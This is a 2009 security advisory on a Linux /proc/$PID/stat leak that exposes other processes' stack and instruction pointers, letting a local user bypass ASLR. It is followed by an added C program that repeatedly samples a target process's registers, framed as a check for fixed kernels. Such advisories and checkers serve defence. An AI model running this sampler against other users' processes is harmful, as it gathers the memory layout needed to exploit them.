Vigil@nce: Linux kernel, information disclosure on a process
May 2009 by Vigil@nce
A local attacker can obtain information about the memory structure of a process in order to bypass ASLR.
Consequences: data reading
Provenance: user shell
Means of attack: 1 attack
Ability of attacker: technician (2/4)
Confidence: confirmed by the editor (5/5)
Diffusion of the vulnerable configuration: high (3/3)
Creation date: 11/05/2009
DESCRIPTION OF THE VULNERABILITY
ASLR (Address Space Layout Randomization) randomizes the position of several regions of a process (stack, heap and shared libraries) each time it is started. An exploit that must jump to a known address (injected machine code, or a function inside libc) therefore has to guess that address, which makes such attacks markedly harder to carry out.
The /proc/$PID/stat file contains information about the state of a process. It is world-readable, so any local user can read it for any process, including those of other users and of setuid programs. Among its fields (numbered as in proc(5), where the pid is field 1):
28th field: startstack (start address of the stack)
29th field: kstkesp (current value of the stack pointer, ESP)
30th field: kstkeip (current value of the instruction pointer, EIP)
35th field: wchan (address of the kernel function in which the process is sleeping, for example the implementation of wait(); its symbolic name is also exposed by /proc/$PID/wchan)
A local attacker can repeatedly read this file while the target process runs. Each sample yields the current stack pointer and instruction pointer; from the set of values collected he learns where the stack is mapped and, whenever the process is executing inside a shared library or returning through one, where that library is mapped. Over time he can thus slowly reconstruct the layout of the stack and the addresses of the libraries, which is exactly what ASLR was meant to hide.
A local attacker can therefore obtain information about the memory structure of a process in order to bypass ASLR. Fixed kernels report these fields as 0 to a reader who would not be allowed to ptrace the target (the same check that governs /proc/$PID/maps); a quick check is to read /proc/$PID/stat for a process belonging to another user, for example pid 1, and confirm that fields 29, 30 and 35 are 0.
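A small sampler, added here as a worked example and not part of the Vigil@nce advisory or the kernel itself: it parses /proc/$PID/stat with the field numbering of proc(5), copes with a comm field that contains spaces or parentheses (the field is located relative to the last ')'), and reports how many of repeated samples of a target process expose a non-zero ESP/EIP. The two sample lines, the pid 4321 and the comm name "my (evil) prog" are constructed; the default target (the parent process) and the sampling interval are assumptions. To exercise the ptrace-based restriction of a fixed kernel, point it at a process of another user, such as pid 1; a process of your own uid may legitimately show the fields on a kernel that only added that check.

```c
/* Added example (not Vigil@nce code): sample /proc/PID/stat to see whether the
 * kernel exposes another process's stack/instruction pointers.
 * Build: gcc -O2 -Wall -o statleak statleak.c ; run: ./statleak [pid] [samples] */
#define _GNU_SOURCE
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Constructed sample line (not captured from a real system). The comm field
 * "my (evil) prog" contains spaces and a ')' on purpose. Field numbers follow
 * proc(5): 28 startstack, 29 kstkesp, 30 kstkeip, 35 wchan. */
const char SAMPLE_STAT_LINE[] =
    "4321 (my (evil) prog) S 1 4321 4321 34816 4321 4194304 512 0 0 0 3 1 0 0 "
    "20 0 1 0 9876 5439488 331 4294967295 134512640 134520000 "
    "3221221376 3221219904 3086226245 0 0 0 0 3222291542 0 0 17 0 0 0 0 0 0\n";

/* The same process as a fixed kernel shows it to a user who may not ptrace it:
 * esp, eip and wchan come back as 0 (also constructed). */
const char SAMPLE_STAT_LINE_HIDDEN[] =
    "4321 (my (evil) prog) S 1 4321 4321 34816 4321 4194304 512 0 0 0 3 1 0 0 "
    "20 0 1 0 9876 5439488 331 4294967295 134512640 134520000 "
    "3221221376 0 0 0 0 0 0 0 0 0 17 0 0 0 0 0 0\n";

/* Return field `fieldno` (1-based, proc(5) numbering) as an unsigned long, or
 * ULONG_MAX if the line is malformed or too short. pid and comm (fields 1-2)
 * are deliberately not handled: comm may contain spaces and ')', so every later
 * field is located relative to the LAST ')' on the line. */
unsigned long stat_field(const char *line, int fieldno)
{
    const char *p = strrchr(line, ')');
    if (fieldno < 3 || !p)
        return ULONG_MAX;
    p++;
    for (int f = 3;; f++) {
        while (*p == ' ')
            p++;
        if (*p == '\0' || *p == '\n')
            return ULONG_MAX;            /* ran out of fields */
        if (f == fieldno) {
            char *end;
            unsigned long v = strtoul(p, &end, 10);
            return end == p ? ULONG_MAX : v;
        }
        while (*p && *p != ' ' && *p != '\n')
            p++;                         /* skip this token */
    }
}

/* 1 if the line exposes a non-zero stack or instruction pointer, 0 if the
 * kernel zeroed them, -1 on a malformed line. */
int line_exposes_registers(const char *line)
{
    unsigned long esp = stat_field(line, 29), eip = stat_field(line, 30);
    if (esp == ULONG_MAX || eip == ULONG_MAX)
        return -1;
    return (esp != 0 || eip != 0) ? 1 : 0;
}

/* Read the single line of /proc/<pid>/stat into buf. Returns 0 on success. */
static int read_stat_line(pid_t pid, char *buf, size_t len)
{
    char path[64];
    snprintf(path, sizeof path, "/proc/%ld/stat", (long)pid);
    FILE *f = fopen(path, "r");
    if (!f)
        return -1;
    int ok = fgets(buf, (int)len, f) != NULL;
    fclose(f);
    return ok ? 0 : -1;
}

/* Sample the target n times, interval_us apart, printing every new (esp, eip)
 * pair: this is the slow reconstruction the advisory describes. Returns how
 * many samples exposed registers, or -1 if the target could not be read. */
int sample_pid(pid_t pid, int n, unsigned interval_us)
{
    char line[1024];
    unsigned long last_esp = 0, last_eip = 0;
    int exposed = 0;
    for (int i = 0; i < n; i++) {
        if (read_stat_line(pid, line, sizeof line) != 0)
            return -1;
        if (line_exposes_registers(line) == 1) {
            unsigned long esp = stat_field(line, 29), eip = stat_field(line, 30);
            if (esp != last_esp || eip != last_eip)
                printf("sample %3d: startstack=%#lx esp=%#lx eip=%#lx wchan=%#lx\n",
                       i, stat_field(line, 28), esp, eip, stat_field(line, 35));
            last_esp = esp, last_eip = eip, exposed++;
        }
        usleep(interval_us);
    }
    return exposed;
}

int main(int argc, char **argv)
{
    /* Assumed default target: the parent process (normally the user's shell). */
    pid_t pid = argc > 1 ? (pid_t)atol(argv[1]) : getppid();
    int n = argc > 2 ? atoi(argv[2]) : 50;
    int exposed = sample_pid(pid, n, 20000);
    if (exposed < 0) {
        perror("reading /proc/PID/stat");
        return 1;
    }
    printf("pid %ld: %d of %d samples exposed esp/eip (%s)\n", (long)pid, exposed, n,
           exposed ? "visible: vulnerable kernel or ptrace permitted" : "zeroed by the kernel");
    return 0;
}
```

The parser scans from the last ')' rather than splitting on whitespace because a process can name itself anything up to 15 bytes, including spaces and parentheses, and a naive split would shift every field number; the constructed comm "my (evil) prog" exercises exactly that.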